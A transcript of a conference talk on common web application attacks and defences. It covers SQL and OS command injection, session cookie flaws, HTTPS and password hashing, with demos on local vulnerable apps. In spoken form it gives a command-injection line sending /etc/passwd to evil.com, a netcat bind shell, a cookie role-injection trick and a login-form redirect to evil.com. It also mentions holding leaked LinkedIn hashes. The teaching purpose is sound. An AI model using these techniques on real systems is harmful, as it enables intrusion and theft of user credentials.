All right. Sorry for forcing you to see all this failed configuration steps. Anyway, thanks for coming. My name is Sasha Goldshtein. I'm the CTO of Sela Group and the Microsoft C# MVP. This has nothing to do with C#, by the way. So if you have Python applications, PHP applications, Node.js applications, really any kind of web framework, this session will give you some of the basic attacks that you should be aware of and outline some of the steps that you should take to protect against these attacks. But mostly I'm going to adopt the mindset of the attacker and try to see how you can find vulnerabilities and exploit vulnerabilities in web applications. Some of these things are more well-known than others. Also, because of network problems, I'm only going to try and hack websites that I'm running on my local machine. This is also the ethical thing to do. And so even if you now have the tools to find and maybe even use vulnerabilities in existing web assets, I do expect you to disclose them responsibly and not just go ahead and use them to your own profit. Anyway, this is my Twitter account and this is my blog. So you can follow me after the talk. And if you have any questions, you can interrupt in the middle and asking questions. I'm just going to have to repeat them so we get that on camera. Or you could also come to me after the talk and we can discuss whatever you'd like. So let's get started. I think that every web developer, and in the context of this conference, every web application architect, every solution architect should be aware of the most common web application attacks. And even if you're not doing any penetration testing, even if you're not at all in the field of security, even if you hire an external company to do penetration testing and risk analysis for you, you should still understand the kind of risks that you could have, the kind of attacks that an attacker could use against your application. You should not fly blind and just rely on an external company to find these problems for you. And obviously, if you're aware of these problems in your development lifecycle, you're going to save a lot of money that you would not have to pay to these external companies. And of course, if someone finds a real vulnerability in a production asset that you have, that could cost a lot more money than paying an external firm or taking these steps during your development lifecycle. Now, one question you might have is what kind of risks are there? I mean, maybe I'm just like a simple website. I don't maintain user credentials. I don't have credit card information. What would an attacker be possibly able to get out of attacking my web property? So the first thing is exposure of user information. And this can be used for identity theft, stealing the identity of your users. This can be used to get your users' passwords and then try to see if these passwords match any other more sensitive web properties that your users might be using. So, for instance, you might have a simple registration form with a username and password that you only use to manage your mailing lists. Like you can give the user the option to subscribe and unsubscribe to a certain mailing list. Users tend to reuse passwords, however. Most people don't use password managers. Most people don't generate 16-character random passwords for every website they use, although it is a good idea. I mean, I tend to do that usually. And if users don't, then by stealing your password database, for instance, if you're not storing your passwords in a hashed, encrypted, salted form, someone might try to log into Gmail or Yahoo Mail or Outlook.com or whatever email service your users happen to be using with the credentials they obtain from your web property. And it's not going to give you a warm and fuzzy feeling to know that you are now responsible for identity theft of your users' identities and for additional risks. And just think about that every user's email account probably has passwords and reset account links to a bunch of additional websites that now the attacker might be able to use. So even if your web property just has these simple username password combinations for something really trivial that you don't feel is worth protecting, your users here are really worth protecting. The other thing, in many cases, is just direct financial gain. Some applications, some web properties do manipulate financial information like credit cards. And if you have to store credit card details, if you have credit card details flowing through your web applications, even if you're not storing them directly, they might still end up in your database. They might still end up in your log files, in some debug files that you might have lying around. And so again, attackers might try to target those. So even if you're not storing anything directly and intentionally, you might have sensitive financial information that an attacker could exploit. Another thing that often happens with web properties, especially hosted ones that you just put off on a cloud provider somewhere on a bunch of virtual machines, is that your machines kind of join an offensive network, a botnet, which does other nasty things, like send out spam, like try to attack and take over additional web properties. And so your website might not even feel manipulated and exposed, but your virtual machines somewhere up in someone's cloud might be running malicious software that's then trying to attack additional systems, try to perform distributed denial of service, send out spam, and so on. And again, it's not a very good feeling to know that your cloud virtual machines are being used for this kind of malicious activities, especially when someone comes to your door with a shutdown request and says, hey, you're running a botnet that sends out spam. And finally, someone might just try to take down your web property for the sake of taking down your web property, just for the sake of denial of service. It could be a competitor, could be a Chinese competitor, or just some random Chinese hacker, that script kiddie, 14-year-old teenager that has a couple of scripts they downloaded from the internet somewhere, and they just happen to stumble upon your web property and try to attack that, just for the sake of it, just for the sake of saying, yeah, I got that one website owned. It's my website now. So even if you think your web property isn't worth the attention of the attacker, it often is. If you're a big web property with millions of users, then there's a lot to be gained by attacking your web property. Even if you have only hundreds or thousands of users, the user data itself is often worth going after from the attacker's perspective. And finally, there's this script kiddie situation in which the attacker is just bored and randomly looking for web properties to attack, and so they stumble upon yours and happen to feel like taking it down or looking for vulnerabilities. So it's really irresponsible to say that I'm just going to put my website up there and ignore completely any security perspective. And unfortunately, some of these things actually apply even in internal web application scenarios, because there probably isn't a single company in the world whose internal network is not compromised in some way. Maybe just one single system that's running some malware, some Trojan, some remote access software that's letting attackers access it from the outside. And often more than just one machine is compromised in this fashion. And so even your internal properties are worth protecting against users from your own organization. Even if your users are not malicious, their machines could be because they are compromised. And again, it's really hard to say these days that my system, my organization, my network is not compromised. You can usually say, I'm not yet aware that my network, my organization, my system is not compromised. That's what most people really mean when they say they're not compromised. So protecting internal applications is often just as important as protecting external applications. And I'd say it's often even more important because you often take the kind of slacking mindset when thinking about security in your internal applications. You might say something like, well, the user is already logged onto a Windows domain, so I'm just going to reuse these credentials for logging into the internal property. Or maybe I'll let my users pick weak passwords, like 4-digit PIN numbers, because, again, it's just an internal property. And so, again, thinking about protecting these internal properties and trying to attack them is equally important and sometimes even more important than your outside-facing properties. This is the list of the 10 most common and most influential vulnerabilities in web applications today. This is the OWASP top 10. OWASP is the open source web application security project. Yeah, I actually got the acronym right, I think. And it's basically an open source project, an open source wiki, you could say, of the most common application attacks today. And so we're going to go over quite a few of these. Let me just say a word or two about each. So injection in the form of SQL injection and the form of OS command injection and other malicious command injection is still the most common attack used against websites today, web applications, websites today. Broken authentication and session management basically means that either you're doing something wrong with securing your session or securing user credentials, or maybe you have some parts of your applications that are accidentally not protected by session and authentication control. Cross-site scripting is still a very common attack, which we'll discuss in detail. Insecure direct object references means that some URLs in your web property might not be easy to guess, but once you know the URL in some way, you can access something that was not intended to. So the URL itself is the key to some important internal object that you can access if only you know the URL. Security misconfiguration is really very generic. So maybe your website is allowing access from the outside if you just happen to know the right password, admin. And then you can access the server, manage the server, do whatever you want to the server. You just need to know that one specific little secret. So that's an example of something that's usually considered a security misconfiguration. Sensitive data exposure basically means that you're exposing some information that you didn't intend over an open channel. One example of this is putting sensitive data in URLs, like usernames and passwords embedded in URLs is often a bad idea, and we're going to look at that as well. Another thing is sending data over an unencrypted connection, HTTP, instead of HTTPS. And that's, again, something we're going to look at. Missing function-level access control basically means that if the user is logged in, they're often allowed to do whatever they'd like, and there's no granular access control limiting access to really sensitive operations. For instance, I suppose your bank often prompts you again for authorization and even for your username and password and PIN code if you're trying to perform a really sensitive operation, like transferring a large amount of money from your account to some third-party unknown account. And that really usually makes sense in a banking application. CSRF, cross-site request forgery, is again something we're going to look at in detail. Using vulnerable components basically means that maybe your application is perfectly secure and you have the best secure development lifecycle in the world, but you happen to be using an outdated library that has security vulnerabilities. You happen to be using an outdated runtime, like a vulnerable version of PHP or a vulnerable version of the .NET framework or ASP.NET. Or even a vulnerable version of an operating system. Windows has security patches every couple of weeks, and more security issues are found in other operating systems as well. So not getting your system up to date, your OS up to date, is also a common source of security issues. And finally, unvalidated redirects and forwards basically means that someone can take a URL from your web property and somehow cause it to redirect to an attacker-controlled property, thereby fooling your users to an offensive web property. So these are the most common issues, and again, we're going to look at most of them in this short talk. Okay, so I'm going to start with SQL injection, which is really like the #1 thing they usually teach when discussing web application security today. So we're not going to go very deep on that, but I will show you an example of another kind of injection, OS command injection, which I think is much more interesting and much less common to see in web applications today. So SQL injection basically happens when you have something like this. This is maybe .NET code using IDO.NET. And it's trying to issue a query to validate the user's credentials. There is a username and a password, and we're trying to see if we have any users with that username and that password. It also kind of implies that we're storing passwords in unencrypted form in our database, which is, again, usually a bad idea. And we'll look at that as well. But suppose we don't want to just address this particular part yet. So if we have this kind of query construction statement that takes the username and the password and concatenates them to create this big query, well, what happens if, for instance, the user parameter is something like that? Backtick or 1 equals 1, whatever. That's SQL injection at its in its easiest form. The query we then execute would be select star from users where name is an empty string, or the string 1 is equal to the string 1, and the password is whatever. And the password is taken from a different password request field. But the important part is that we're now looking at name equals empty string, or 1 is equal to 1, which is always the case. And because of operator precedence between and or, you end up always retrieving the whole user's table by performing this query. So if you're just relying on the number of records returned to determine if the user is authorized to access the system, then you're always going to decide that the user is authorized to access the system. And that's a pretty bad idea. Now, this is SQL injection, again, in its easiest form, but there are much more sophisticated attacks that can be applied even if you're not constructing your queries in this really, really stupid way. I'm not sure you're familiar with XKCD, but this is, this is a classic, really. So the principal is calling from school. Hi, this is your son's school. We're having some computer trouble. And then mom says, oh dear, did you break something? Yes, in a way. Did you really name your son Robert drop table students dash dash? And so, oh yes, little Bobby Tables, we call him. And so apparently someone used this name as an input field, maybe in some vulnerable web application, and then they ended up dropping the students table. So hey, we just lost this year's students record. I hope you're happy. And I hope you've learned to sanitize your database inputs. Okay, so yeah, we could name our kids Robert drop table students dash dash, but it kind of illustrates the mindset. So another form of injection, which I think is more interesting because it's less common, and one I'm going to show you an example of now, is OS command injection. So suppose for some reason your web application has to perform DNS lookup, just resolve a host name to an IP address for some reason. And you're taking in that host name from the outside. So you might just say something like, oh, I'm not sure which class exactly performs DNS lookup for me in .NET, Ruby, Python, whatever framework I happen to be using. So I just use the system's built-in NSLookup tool. And I'm just invoking it like any other system tool by passing in the host name through the command line. Well, this gives the attacker an opportunity to run arbitrary commands in the context of your web server. And really arbitrary commands. So for instance, if the host name parameter here happens to be whatever, and then pipe cat etc password to netcat, which sends them to evil.com, then you happen to be sending this file to this host. Again, it's kind of a Unix-like command line. Cat just dumps out the file contents, and then nc netcat is a built-in tool in most Linux distributions, which sends out the standard input to evil.com in our case. Now, again, this sounds really silly in a way, but there's a bunch of web properties that happen to be using something like that today. And also, there's a bunch of internal tools, even internal hardware kinds like routers and switches and other network-like devices that have this kind of functionality. And so if they're exposed to the internet, things go really bad. But even if they're just exposed internally, again, that opens up a huge attack surface from any compromised machine in your organization. And at the end of the talk, I have an example of a real vulnerability from a D-Link router, which is one of the most common routers used in the US, for example. And it has exactly this kind of vulnerability alongside others. So the most recent one I've found is from September 10th, and again in a D-Link router, which has this kind of ping option. You can input an IP address, and it will ping that for you just to see if you're connected to the internet, if everything's routed properly. And it looks a lot like this. So this thing is called DVWA, Damn Vulnerable Web Application. It's running locally right now. We're not hacking anyone but ourselves. And it has this kind of ping for free option. So I can input an IP address, and it's going to try and ping that for me. And again, this is what this D-Link router has in one way or another. It has this unauthenticated interface for pinging an IP address just to see if the connectivity is fine. So if you enter an IP address below, like localhost, and click submit, a couple of seconds later, you get this nice output. And this looks suspiciously like the output of the ping command that's built into the operating system. So it's not like someone wrote any code to issue ICMP ping requests and parse the replies. They just basically take the input and pass that through to a system call. Well, what if we try something like whatever and then ls? So now we get the output from the ping command, and then we get a directory listing. Interesting. So it looks like we can effectively run any command in the context of that web server, which I really hope isn't running as root, super user. But still, it could be pretty nasty to delete files, introduce new files, change existing files. And one example I'd like to show you that I have pre-cooked here in the autocompletion is this thing here. So basically, I'm going to break it in parts. Well, first, I'm just going to issue this localhost IP address, and then semicolon, make FIFO is, again, a Unix built-in command that creates a bidirectional communication channel, and it's called temp/a-pipe. And then again, another semicolon, and what I have next is sh, which is one of the built-in shells in most Linux distributions, which takes this a-pipe as input and pipes that out to netcat in listen mode on this port, and the output from netcat goes into that pipe again. So what this does is establish a server which now listens for incoming requests on port 13371 and executes whatever comes in. So if I just do that and switch over to my command line here, I can now netcat into localhost on that port, and it's ready to accept commands. Like, again, I could do ls, but now I can also cd to the external directory. And I can clear, well, no, I can't really clear the screen, but I can create new directories and put some files in them. And it just all, yeah, did I really? No, it didn't really create the directory. Anyway, yeah, but we're in, yeah. And if I Control C and go back, only now does this web page refresh and give me the output. Yeah, so this is almost a real example. I don't have that particular D-Link device to show you that has this vulnerability, but it basically has this kind of input box into which you can type arbitrary commands that it will then happily execute. And so you can create new users, send out the password file to somewhere, or establish a server that listens for incoming commands from the internet. And because it's a router, it would often be exposed to the internet. And if you just know the IP address, which you can also send to a remote server with a simple shell command, then you can just set up a server that collects incoming IP addresses and then tries to automatically infect them with something. So that's pretty bad. And that's an example of operating system command injection. SQL injection is really, I have a demo of that as well, but it's really trivial. And so I'll stick with the OS command injection example for now. So that's one example of an attack. That's the #1 thing in the OS list. And some ideas for mitigation would be, well, do not trust user input of any sort, ever. Anything that comes into your system through headers, through URL parameters, through post request bodies, through edit boxes that you put up on your website, anything that comes in should not be trusted one bit. Now, some modern functional programming languages even have that concept of tainted data types. So you could have like a standard string and a tainted string. And a tainted string is one that was originally something provided by the user. And so this kind of tainted data type would follow through the whole system, and you always know that's a tainted string. You're not supposed to pass that to other internal commands. But languages like PHP, Python, Ruby, Node.js, C#, C++, they don't have tainted data types. And so we really have to exercise a lot of care when treating external input as input to other things we do internally. Another thing is do not run code provided by the user. Again, it sounds pretty logical. Once you agree that you should not be trusting user input, you should obviously not be trusting code that the user provides and just blindly run it. But again, there's a bunch of examples of this. You could have forum software that takes HTML as input and then displays it on a website. Well, HTML also has JavaScript, so you might end up taking JavaScript provided by the user and running it on your website. Another example is all these kinds of, even not web applications, smart client systems, when you let the user write scripts, like Python scripts, C# scripts, whatever, and then you end up executing them on the server. Again, you should be very careful with this kind of input from the user. And code is much harder to verify than just plain input like a username, because it's actually theoretically impossible to determine what a given piece of code is going to do. So obviously, it's also theoretically impossible to determine if a piece of code is safe or not. So again, it turns out to be a very difficult problem. And finally, do not use blacklists for validation. Like, you could take this example with the select query and decide that the apostrophe character is now illegal. You're not taking in anything that has an apostrophe. Or maybe you could take the OS injection example and say the semicolon is illegal. I'm not taking in anything that has a semicolon. Or maybe the ls command is illegal. It's doomed. I mean, this approach is really doomed because there's no way in the world you could possibly predict all the possible ways to attack your system by providing invalid input. So do not use blacklists. Use whitelists. Use whitelists that are very carefully crafted for the kind of inputs that you expect. Regular expressions are often good for this because they tend to be very strict about what they take in. Whitelists of characters are often a good idea, although encoding sometimes gets around that, and we'll see an example of this as well. And for SQL injection, using SQL query parameters, which most languages and frameworks provide, often happen to work around most kinds of SQL injection. However, there is just one piece of advice for closing this topic that I would like to mention that's not really valid these days. People often say that if you used stored procedures, then you don't have any chance of SQL injection. If you pass in the inputs to a stored procedure, instead of trying to execute queries in your application code, then there's no way to use SQL injection in that stored procedure. But I mean, if that stored procedure is constructing queries by concatenating strings, and then it runs these queries, it's just as vulnerable to SQL injection as your application code. I mean, it's not like the database is better at concatenating strings. It's just as good at that as your application. And so stored procedures are not an automatic thing you put on your checklist and say, now we're safe against SQL injection, just to put that out there. And in fact, there are many examples of SQL injection attacks that happen to attack systems that have stored procedures, that use stored procedures exclusively. And so it's not a solution anymore. And finally, do fuzz your code with invalid input. And fuzzing is the process of automatically creating a bunch of invalid inputs and passing them to your application to see what it does. And so there are tools for this. There are tools for fuzzing towards OS command injection, towards SQL injection, and just random fuzzing to see if maybe your system crashes when the username is longer than 30 characters. So there are existing tools for this which can fuzz your system and automatically output a number of cases in which your server did not behave as it was expected. For instance, if the request took too long, or if it crashed, return an invalid error code, anything of that sort. So there are tools for this, and I'll be happy to give you a couple of references later. So let's take a look at sessions, URLs, authentication a bit. Well, the session ID, or the session cookie, which we'll see a couple of examples of in a second, is a really important secret, because most web application frameworks today use session IDs to authenticate the user, to know that the user is really logged in, because HTTP, as you know, is a stateless protocol. So you can't establish a bidirectional communication channel and trust the integrity of the channel. You have to trust cookies, you have to trust something that's part of the URL, you have to trust something that's passed along with every request and response and identifies the user. And so trusting the session ID, trusting the session cookie is really something that we should look at more closely. For example, if you embed the session ID or the session cookie in your URL, well, first, that URL just happens to now be stored in pretty much every web server log on the way from the user to your web application. Every proxy along the way, for example, is going to store that URL in a log somewhere. And if any of these logs happen to be compromised, then your session IDs and session cookies also happen to be compromised. And this obviously applies to HTTP connections, but it also, to a certain degree, applies to HTTPS as well, because web servers might log HTTPS requests as well to log files. So you probably shouldn't be putting session IDs or session cookies in the URL itself. But even if you do, try to make sure they're not predictable. For instance, here it says cart PHP session number 127. The first thing I'm going to try and do with this is change this 127 to something else, like 128 or 126, and see what happens. And if I end up logged in as another user, that's going to be pretty bad. If I end up seeing someone else's shopping cart and I can then perform operations on that shopping cart, that's going to be pretty bad. And so even if you put these things in URLs or cookies, you really should try to make sure they're secure and hard to guess. And the contents of that session thing itself is something that you often shouldn't trust. And I have an example of this, which I'm going to show you in the demo. But first, a couple of do's before we go on to the demo. If you're using cookies for session storage, and we'll look at a system that uses cookies for session storage in a second, make sure it's a secure cookie, which means it can only be passed through HTTPS and not HTTP requests. And make sure it's an HTTP-only cookie so that it can't be accessed by JavaScript. HTTP-only cookies will only be sent by the browser when you issue requests. They will not be accessible from JavaScript. So these are a couple of good ideas to do with session cookies, and we'll review an example in a second. And finally, use long, random, hard-to-guess session IDs. And again, I'm going to show you an example of that breaks pretty much every one of these guidelines in a demo. So let's take a look at exploiting vulnerable session information. This time I have a somewhat more sophisticated web application. This is actually a Google open source project that they use to teach web application security. It's a really great thing, and you can download it off the web. You could also create your own instance of that project and run it on Google's app engine. And so you don't even have to configure anything on your system, and you have a web server that's entirely yours and yours to hack. And you can try a bunch of the attacks we're going to see. So basically, this thing is a system for users to share snippets of text. So for instance, we have a couple of users here, Cheddar, Mac, and Bree, which have shared, thank you, which have shared, which have shared a couple of snippets. And so let me just create a new user. I'm going to sign up. Oh, the web page is not available. Let's see. Here's my website. OK, so I'm going to sign up, create a new account. Let's suppose I'm going to be Mike this time with the password of 123. So watch for what happens. I'm going to hit Create Account. Chrome offers to save the password, and RoboForm, which is my password management, also prompts me to save the password. But let's take a look at the URL here, which is the first thing that's really gone bad. The URL here has this save profile thing, action, new, UID, Mike, password 123. That sounds pretty bad because it does mean that this URL is now going to end up in all the web server logs along the way. Plus, it's HTTP and not HTTPS, but we have a separate couple of slides dedicated to that. So the first bad thing here is that we're passing through the username and password just as part of the URL. But let's take a look at the cookie. And I'm going to use a plugin, an extension for Chrome called Edit This Cookie. Are any of you using that thing? It's a really nice extension. So here's Edit This Cookie. What it basically does is just show you all the cookies that the current domain has, the current web page has, and it lets you edit the cookie to see what happens. So we have a cookie here. This is the main cookie for that web application, and the cookie contents are just this thing here. There's a number, which looks pretty long and random, so there's a good chance it was generated on the server and it's to some degree secure. But then it has my username, this weird pipe in here, a couple of pipes, and then it says author. Well, again, this lends itself to experimentation. What if we change this number? What if we change the username? What if we change this to administrator? Are interesting things going to happen? So first, let's try to change the username. I also happen to have a user called Dave. So let's see. If I just modify this to Dave and then click Submit Cookie Changes down there. Let me try and go home now. Oh, no. You see, I'm signed out. So this attack didn't really work. I wasn't able to just fake the username. So let me try and sign up as Dave now, which also has the same password. If I log in as Dave and inspect the cookie, you'll notice the number looks completely different. So it does look a bit random-ish. It's long, it's hard to guess. And so maybe the rest of the cookie has something to do with that number. So that's why I can't so easily modify it. Like maybe this number is a hash or a checksum of the rest of the cookie contents. So even though it does look vulnerable, this fact that I have the username in here just as part of the session cookie, maybe this number is enough to protect that information. However, you will notice right away that the cookie is not marked as secure. So it's not only accessible from HTTPS, it's also accessible over HTTP. And it's not marked as HTTP only, which means I can run JavaScript to retrieve the cookie contents and maybe send it off to some evil server. And that's, again, something that we're going to do soon. But from the perspective of attacking the session cookie, maybe trying to guess it, trying to change it, it seems that we've hit a dead end. However, let's try to understand this part here. Dave, pipe, author, and so on. It happens to be the case that the server is taking this string and parsing it using the pipes. And the pipes are really separators for 3 different parts of the user information. The first is the username. The last is whether the user is allowed to create new snippets in this application. But the one in the middle, the one that's empty here between the 2 empty bars, is whether the user is an administrator or not. Now again, there's no way in the world I can just put administrator in there because I have this random number here protecting the cookie contents. But there's opportunity for injection here, which is rather surprising. What if I create a new user? Let's sign out of this one and sign up. Let's create a new user called Z, pipe admin, pipe author. So if my hypothesis is right, then the web server is just going to, well, it's going to create a new user for me, but then it's going to parse this thing and just treat it as the original data. And so the username part is going to be treated as the username Z, who is an admin and has snippet authoring rights. So let's create a user like that. I hit create account. The account was created successfully, which is not a surprise. Let's look at the cookie. Here's the cookie. Z, admin, author, empty pipes, author. OK, and if I go home now, I have a manage this server link up there, which means I am, in fact, an administrator. And now I can do all kinds of malicious things like reset the server, quit the server, or even edit another user's profile. Well, that's what the administrator rights are equivalent to in this particular application. So this kind of combines the insecurity of the cookie with the concept of injection that we've previously explored. Now again, the cookie, it looked kind of secure. I mean, the number here in the beginning seemed to indicate that I can't forge the cookie contents, but the additional data was really unnecessary, right? I mean, the server should probably know whether the user Z is an admin or not, whether the user Z is allowed to author snippets or not, and even that the user is, in fact, Z, because this number here probably can be associated with the identity of the user Z. And so this whole part here after the pipe really should be removed from the cookie. You really just want some random thing that's the cookie, and manipulating that should really be impossible for the attacker. Could be a one-way hash of some important information, could be just a GUID that's then associated on your server with this important information, but you really shouldn't put things like usernames and access control roles in your session cookies. That's going to be pretty painful later. So just going back to the advice here, do not embed cookies and session IDs in URLs. Use secure and HTTP-only cookies to make them harder to steal by using JavaScript or steal over insecure connections. And use long random session IDs which do not contain anything else, any additional information that the attacker can view and try to forge. OK. The next thing I want to show you, discuss, really, is HTTPS. HTTPS is the HTTP secure protocol, which basically means that if you're talking to a server over HTTPS, the whole connection is encrypted end-to-end, and there's no way for anyone to manipulate the data unless the encryption certificates are compromised. Now, if you've heard anything about the recent NSA developments, you know that large government agencies like the NSA and GCHQ and the Mossad and whatever do have the ability to forge and manipulate encryption certificates, at least to some extent. But most attackers do not have that capability. So unless the NSA is trying to target your traffic and that's what you're worried about, you're probably good with using HTTPS consistently. However, many websites today do not use HTTPS for everything. Like maybe they use HTTPS for the shopping cart, but not for the login page. So the login page is served over HTTP, but then once the user logs in, everything is then encrypted and transferred over HTTPS. Or maybe the login page is not fully encrypted. Like most of the page is actually HTTP, but there is a frame embedded in that page which uses HTTPS, which is loaded from an HTTPS asset. All of these ideas are pretty bad because as soon as something is transferred over HTTP, you are subject to a man-in-the-middle attack, where anyone pretty much on the internet could have the opportunity to manipulate your traffic. So for example, if your login page is only partially loaded over HTTPS, someone could end up injecting code that manipulates the HTTPS parts on your login page, like maybe manipulates that particular frame that's loaded over HTTPS, or maybe removes that frame altogether and replaces it with another login form, which redirects to some other attacker-controlled property. So the only reasonable thing to do is to insist on only HTTPS, on pure HTTPS, for anything sensitive in your application. Anything that has to do with the login sequence, anything that sends over session IDs, session information, user information, all of that has to be over HTTPS. Now, I almost have a demo to show you. However, I have to apologize for that. The internet connection has failed me a bit, but I'm going to show you the idea. I'm sure many of you have seen Fiddler. Fiddler, the web debugger. It's a really wonderful tool. I actually have a larger font over here in this virtual machine. The Fiddler web debugger is a great tool for inspecting HTTP traffic, but it can also manipulate HTTP traffic. And so I can, with a few lines of code, create a Fiddler script which will execute automatically for any connection that passes through Fiddler's web proxy, that would take a login page and redirect it to another location. So in my case, the page itself, the page that I'm going to attack, is this sign-in page, the login page. If we look at the source right here, you'll notice that after all the CSS, there is eventually a login form, which is loaded over HTTP. This whole application is loaded over HTTP. And so the login form has a method of get and an action that goes to the root of the current website, /login. That's what it's going to access. What I have here in my Fiddler script is a bunch of code that, again, I'm not going to be able to run right now, but you will be able to experiment with this if you only have an internet connection. And it basically inspects all the traffic that's coming through Fiddler, and if the session URL, if the web URL contains /login, it then unzips the response because the server is using gzip compression, so it unzips the response to view it in plain text. And then it replaces in that response the form HTML tag. It replaces the action from the login, which is the valid authorized thing to do, with evil.com/login or whatever. And as a result, the form I'm going to get is just going to have this little replacement where the action is redirected to evil.com. So the user is still going to see this very unsurprising login form, and is going to be none the wiser that the target of that form has now been redirected to evil.com. By the way, evil.com is an actual web domain. I'm not sure what's behind it, but it's there. So you can definitely experiment with this. Now again, I can't show you this because I have some problems with Fiddler connecting to parsing localhost traffic, even though it should theoretically work, and the internet connection doesn't work. So I'm just going to leave that there. However, the script itself I will make available as part of the demo code for this session. And you can experiment with this yourself. So anything that's loaded over HTTP is then subject to capturing, dissecting, and manipulation by a web proxy or by any man in the middle who's able to view the traffic that's being sent over the wire. Now, if you're used to connecting to open wireless networks in coffee shops, this might change your mind a little bit, at least if you're using HTTP, any HTTP web asset that manipulates sensitive information. So really, you should insist on HTTPS for anything, even your internal applications. And securing your internal applications with HTTPS is often easier than web-facing properties because you have full control of the certificate chain. So you often don't even have to pay for a real SSL certificate. You can issue your own and install it through group policy or whatever on all your users' machines. But for web-facing properties, you should probably invest in a real SSL certificate. So that was HTTP and HTTPS. Now, another thing I want to tackle is storing any kind of sensitive information. And by sensitive information, I usually mean usernames and passwords, but for some applications, that could also include credit card details, addresses, physical addresses of your users, shopping histories, even advertising information, like whatever ads the user has seen and acted on could be considered pretty sensitive and useful for an attacker to then resell. So the only principle there really is the least responsibility principle in terms of not taking responsibility for anything you don't have to take responsibility for. So if you don't have to store credit card information, don't store credit card information. If you don't have to store or even log any physical addresses of your users, MAC addresses, IP addresses, locations, whatever, don't store them. And having that information pass through your system often constitutes storage as well, because like I said, there are web servers all over which save whatever data that's passed through, especially if you can configure them in a debug setting. So just don't store anything that you don't have to store. However, one thing that pretty much every web property has to store is usernames and passwords. And so I want to address that specifically. For usernames and passwords, the one really basic piece of advice is do not store passwords in clear text. Do not store the actual password string, because that makes it just way too easy for the attacker. I mean, if the attacker gains any kind of access to your database, direct, indirect, maybe from a backup site, whatever, they have the plain text of the passwords, which can then be used to attack your application, or again, to attack any other web properties where the user happens to be reusing that same password. Okay, so you might say, let's store the passwords in encrypted form, like maybe super duper encryption, I don't know, something that even the NSA cannot crack given all the computing resources of the world. And there are such encryption algorithms, or at least we assume that the NSA isn't yet able to crack them. But storing passwords in encrypted form is often not a very good idea as well. Because if you're storing passwords in an encrypted form, it means you also should be able to decrypt them. So you have the encryption key somewhere. I mean, it's either in that same database, or maybe in a configuration file on your web server. Maybe it's like hard-coded in the application itself. That also happens. And if the attacker gains access to any of these resources, they can decrypt your database. They can decrypt your password database. So the common advice here usually is to hash and salt your password. So let me just expand on that for a moment. By hash, we mean apply a one-way function to the password before storing it. And a one-way function has the property that it's very difficult to reverse. So it's maybe easy to compute the value of that one-way function given a string, and that's the hash, but it's really difficult to guess the original value given only the hash, and that's what makes it a one-way function. Now, one-way functions are known to exist and are hard to crack. However, if you just store a one-way hash, it might not be subject to a brute force attack that's trying to guess every possible password, but it might be subject to a pre-computed, stored table of hashes. And there's a couple of databases online, like, for example, the online hash crack website, and that's just one of many, that has pre-configured, pre-computed databases of a lot of passwords out there, hashed using a bunch of hashing algorithms, like MD5, SHA-1, MTLM, which is what Windows authentication uses. So the basic premise here is that when trying to crack a hash, trying to guess the password given a hash, you're not trying to brute force all the possible password combination. You just look up the password in a table that's pre-computed and stored somewhere. And so here I have an example. Fortunately, I've done this before the session because the wireless isn't working anymore, but I've provided a really long, crazy hash. This is, well, it's actually not that crazy. It's just MD5, which is a pretty weak hashing algorithm. But anyway, it looks totally random. And in a split second, the website replied that this is, in fact, the MD5 hash for the password 123. And password 123 is a pretty bad password, but it does have uppercase and lowercase letters. It has digits as well as letters. It's not very short. And still, it's been pre-computed and stored in that database somewhere. And most weak passwords are. Most passwords up to 10 characters are already stored and hashed in some database somewhere. And even if it's not publicly accessible, attackers often have access to resources that are not publicly available. And there are cracking botnets which would attempt to calculate hashes for a small fee. There are databases that you can rent and sell. There's a whole big black market around hashing, cracking, and retrieving passwords. So the concept of salting is also quite popular now, which basically means that before hashing the password, you append to that password another little piece of data, which makes it harder to reverse using these conventional websites. Like maybe instead of hashing password 123 as a string, I'm going to hash password 123 and then the sign-up time of that particular user, the sign-up date and time when that particular user has created their account, which is extra information. It's still available somewhere. So if I have the password and I have the user information, I can still calculate the hash. But the chances of that specific hash ending up in a database somewhere in the internet is lower because it has some additional, very context-sensitive information. And the more random and bigger the salt you use, you usually get better results in terms, not bigger in terms of characters, but bigger in terms of different possibilities and being hard to guess. Another good idea, yes?
Does that apply to connection strings?
Does that apply to connection strings? In which way?
How do you skew the connection strings?
Yes, well, you mean database connection strings? Database connection strings are a bit different from usernames and passwords for your users because the database connection string you actually have to pass to the database. I mean, the database expects for you the plain text username and password. So you can encrypt your connection strings, but you can't store a hash of your connection string because you can't give that to your database. But to verify that your user is really who they're pretending to be, you take the username and you match the hash of the password with the hash that you already have stored in your database. You don't pass that on to someone else. So for connection strings, you can't really apply a hash. For usernames and passwords, you can, because you can verify the hash. Yeah, another piece of advice, which is a good idea for many web properties today, is to reject weak passwords right away during sign-up. So if your user is going to try a bad, weak password, well, just reject that thing outright. Don't let your users create passwords like password, or user, or I love you, which are pretty common passwords, it turns out. So even if you hash and salt these things, it's just usually a better idea to not even try and use these kinds of passwords. Now, users will object to this. I mean, users don't like, even developers, even architects, even security guys, don't like having to store in their head a bunch of complex, random passwords. Like, I don't know most of my passwords. I mean, seriously, I know the passphrase to my password manager, which is RoboForm, and I have it installed on all my devices. And that passphrase I actually memorize and change every couple of months. But the passwords themselves, I have no idea what they are. Most users, however, again, kind of don't go well with that advice. So another thing to consider is just delegating the whole business of storing and managing and authenticating users to a different third party, like maybe Google or Microsoft or LinkedIn or Twitter or Facebook. And you know that many mobile applications today have the option of signing in with your Facebook, Twitter, LinkedIn, Google, Microsoft accounts. Websites can also take advantage of that. And so if you really don't have to store usernames and passwords, you might consider letting your users authenticate using existing web authentication standards. And OAuth is one such standard, which happens to be used by Google, Microsoft, LinkedIn, Twitter, Facebook, and so on. And the flow is basically that when you have to authenticate your user, the user is redirected to a page from Twitter or LinkedIn or Facebook, which accepts the credentials and generates a token, which is then sent to your application. So you don't see the username, you don't see the password, you take no responsibility whatsoever for that information. And if your user is hacked, so to speak, they can blame Twitter or Facebook or LinkedIn, but they cannot blame you. And you don't have to store and back up and manage passwords and usernames ever again. In many cases, you still have to combine both options, maybe let your users choose a username and a password or log in with an existing account, but that often is a good idea. Now, just to show you the weakness of hashes, before we discuss hash functions, I want to show you another demo. What I have right here, what I have right here, let me just show you the file, is a bunch of hashes leaked from LinkedIn about 1.5 years ago. This was leaked, initially it was leaked through some black market websites selling password hashes, but eventually it found its way on Dropbox and a bunch of other sharing websites, and so at some point I grabbed my own copy. This is a dump of a large number of LinkedIn user passwords, and they're hashed. It's not like you see easy strings here like password and I love you, but they are hashed. And the zeros, the 5 leading 